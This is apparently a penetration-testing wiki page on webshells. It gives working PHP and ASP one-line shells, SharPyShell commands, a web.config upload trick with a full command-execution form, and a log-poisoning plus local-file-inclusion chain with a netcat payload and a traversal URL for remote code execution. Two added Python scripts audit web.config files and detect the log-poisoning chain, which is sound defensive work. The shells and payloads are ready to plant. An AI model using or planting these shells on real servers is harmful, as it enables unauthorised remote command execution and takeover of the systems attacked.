# Webshell

### PHP 15 bytes shell

```php
<?=`$_GET[0]`?>
```

{% embed url="https://pbs.twimg.com/media/FKmzH22XIAIIPdQ?format=png&name=900x900" %}

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FyZHT1VlGin8YMNUYvsMq%2Fimage.png?alt=media\&token=10b4ebc8-68f9-4e06-b2a7-487856214eee)

### Asp/Aspx

**One Line ASP Shell**

```aspnet
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
```

Request with: <http://target/shell.asp?cmd=ipconfig>

[**SharPyShell**](https://github.com/antonioCoco/SharPyShell): a tiny, obfuscated ASP.NET webshell for C# web applications.

```bash
python SharPyShell.py generate -p somepassword
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
```

### **Running web.config as an ASP file**

Sometimes IIS serves ASP files but it is not possible to upload a file with the .asp extension. In that case a web.config file can be uploaded directly to run classic ASP code:

```aspnet
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

{% embed url="https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/asp" %}
Examples of asp webshells.
{% endembed %}

A longer variant of the same web.config trick, with a form that runs a command and shows the result:

```aspnet
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
 
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
```

Reference: <https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/>
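
Both web.config samples above depend on the same handful of settings: a handler that maps `*.config` to asp.dll, an access policy that includes `Write`, `.config` removed from the blocked extensions, `web.config` removed from the hidden segments, and a payload placed after `</configuration>`. The audit below, an added example that is not code from the original page or the referenced blog post, checks an uploaded web.config for exactly those points. The finding names, the `SCRIPT_MODULES` list and the two sample configs are constructed here (the suspicious sample is the page's own config with a shortened payload comment).

```python
"""Audit a web.config for the handler-mapping trick described above.

Added example, not code from the original page or the referenced blog post.
It flags the settings the sample config relies on (a handler that sends
*.config to a script engine, a Write access policy, .config removed from
the blocked extensions, web.config removed from hidden segments) plus any
content after </configuration>, which is where the ASP payload sits.
"""
import xml.etree.ElementTree as ET

# IIS handler modules that hand a request to an external script engine.
SCRIPT_MODULES = ("IsapiModule", "CgiModule", "FastCgiModule")

# Constructed sample: the page's web.config with a shortened payload comment.
SUSPICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!--
<% Response.write(1+2) %>
-->
"""

# Constructed sample of a config that leaves the IIS request-filtering defaults alone.
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <defaultDocument><files><add value="index.aspx" /></files></defaultDocument>
   </system.webServer>
</configuration>
"""


def audit_web_config(text: str) -> list[str]:
    """Return sorted finding names for one web.config; empty list means nothing flagged."""
    findings = []
    head, closing, tail = text.lstrip().partition("</configuration>")
    if tail.strip():
        # The ASP payload in the samples above is placed after the root element.
        findings.append("trailing_content_after_configuration")
    root = ET.fromstring(head + closing)

    for handlers in root.iter("handlers"):
        if "write" in handlers.get("accessPolicy", "").lower():
            findings.append("handlers_access_policy_allows_write")
        for add in handlers.findall("add"):
            maps_config = add.get("path", "").lower().endswith(".config")
            scripted = bool(add.get("scriptProcessor")) or add.get("modules") in SCRIPT_MODULES
            if maps_config and scripted:
                findings.append("config_mapped_to_script_handler")

    for rm in root.iterfind(".//fileExtensions/remove"):
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("config_extension_unblocked")
    for rm in root.iterfind(".//hiddenSegments/remove"):
        if rm.get("segment", "").lower() == "web.config":
            findings.append("web_config_unhidden")
    return sorted(set(findings))


if __name__ == "__main__":
    for label, cfg in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, audit_web_config(cfg) or "clean")
```

Any one of these findings in a user-writable directory is worth an alert; the practical mitigation is to keep upload directories out of IIS's config inheritance (or deny web.config writes there entirely) so an uploaded web.config is never read as configuration in the first place.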

### **Log poisoning + LFI + shell**

Required: an initial LFI has already been found.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHfTwQGzXRX49GrnRK%2F-MXHheLXUfbhYi3tAi1R%2Fimage.png?alt=media\&token=3a723cd1-de19-43d0-9e75-4e0b0f791eb1)

The intercepted request is shown above; the PHP payload is placed in the User-Agent header by replacing the highlighted data, so that it is written into the web server's access log.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHfTwQGzXRX49GrnRK%2F-MXHhol_wtsfiRQBBqyI%2Fimage.png?alt=media\&token=b23e74cf-70be-4d36-a728-a9d61f1d2a95)

The payload can also be written into the log by sending it raw with netcat:

```text
nc -nv 10.11.1.35 80
(UNKNOWN) [10.11.1.35] 80 (http) open
<?php echo shell_exec($_GET['cmd']);?>

HTTP/1.1 400 Bad Request
```

Next, get RCE by adding the **cmd** parameter:

```text
http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHfTwQGzXRX49GrnRK%2F-MXHieG1y6czlAqchXKo%2Fimage.png?alt=media\&token=394c4063-4283-41ad-a26b-1b3adfa5dcd6)

Reference: <https://www.hackingarticles.in/apache-log-poisoning-through-lfi/>
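
Seen from the log itself, the chain above leaves two distinct traces: a PHP open tag that lands in the logged request line or User-Agent (the poisoning step, including the netcat variant that Apache records with a 400), and a later request whose include parameter traverses to a `.log` file, here with a trailing `%00`. The detector below, an added example that is not code from the original page or the referenced write-ups, parses Apache combined-format lines, labels each line, and links the two steps by client address. The indicator names, the log lines and the client addresses are constructed for this example.

```python
"""Detect the log-poisoning chain above in Apache combined-format access logs.

Added example, not from the original page or the referenced write-ups. It
parses each line, reports PHP open tags that landed in the logged request
line, User-Agent or Referer (the poisoning step), reports traversal to a
.log file and a trailing %00 (the inclusion step), and then links the two
by client address. SAMPLE_LOG and its addresses are constructed.
"""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:\.\.(?:/|%2f|\\|%5c)){2,}", re.IGNORECASE)
LOG_TARGET = re.compile(r"\.log\b", re.IGNORECASE)
NULL_BYTE = re.compile(r"%00")

# Constructed sample log: header poisoning, raw payload via netcat (400),
# the inclusion request, and one ordinary request from another client.
SAMPLE_LOG = """\
10.11.0.5 - - [10/Mar/2021:14:02:11 +0000] "GET /addguestbook.php?name=aaa&comment=aaa HTTP/1.1" 200 512 "-" "<?php echo shell_exec($_GET['cmd']);?>"
10.11.0.5 - - [10/Mar/2021:14:02:40 +0000] "<?php echo shell_exec($_GET['cmd']);?>" 400 226 "-" "-"
10.11.0.5 - - [10/Mar/2021:14:03:02 +0000] "GET /addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.11.0.9 - - [10/Mar/2021:14:05:00 +0000] "GET /index.php?LANG=en HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def classify(line: str) -> list[str]:
    """Return the indicators found in one log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable_line"]
    found = []
    # Poisoning step: PHP code stored in any logged, client-controlled field.
    for field in ("req", "ua", "ref"):
        if PHP_TAG.search(m[field]):
            found.append(f"php_tag_in_{field}")
    # Inclusion step: traversal that reaches a log file, plus null-byte truncation.
    if TRAVERSAL.search(m["req"]):
        found.append("path_traversal")
        if LOG_TARGET.search(m["req"]):
            found.append("log_file_targeted")
    if NULL_BYTE.search(m["req"]):
        found.append("null_byte_in_request")
    return found


def poisoning_chains(log: str) -> list[str]:
    """Clients that first planted a PHP tag and later pulled a log file via traversal."""
    planted, chained = set(), []
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = classify(line)
        if any(f.startswith("php_tag_in_") for f in found):
            planted.add(m["ip"])
        if "log_file_targeted" in found and m["ip"] in planted and m["ip"] not in chained:
            chained.append(m["ip"])
    return chained


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(classify(line) or "clean", "<-", line[:60])
    print("chains:", poisoning_chains(SAMPLE_LOG))
```

A PHP tag in a logged header is already worth an alert on its own, before any inclusion happens. The `%00` suffix in the page's request relies on null-byte truncation of the include path, which PHP removed in 5.3.4, so its absence in later traffic does not make the traversal harmless; the fix that covers every variant is to never build an include path from request input, with `open_basedir` as a second layer.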

{% embed url="https://dheerajdeshmukh.medium.com/get-reverse-shell-through-log-poisoning-with-the-vulnerability-of-lfi-local-file-inclusion-e504e2d41f69" %}

{% embed url="https://shahjerry33.medium.com/rce-via-lfi-log-poisoning-the-death-potion-c0831cebc16d" %}

{% embed url="https://github.com/nil0x42/phpsploit" %}
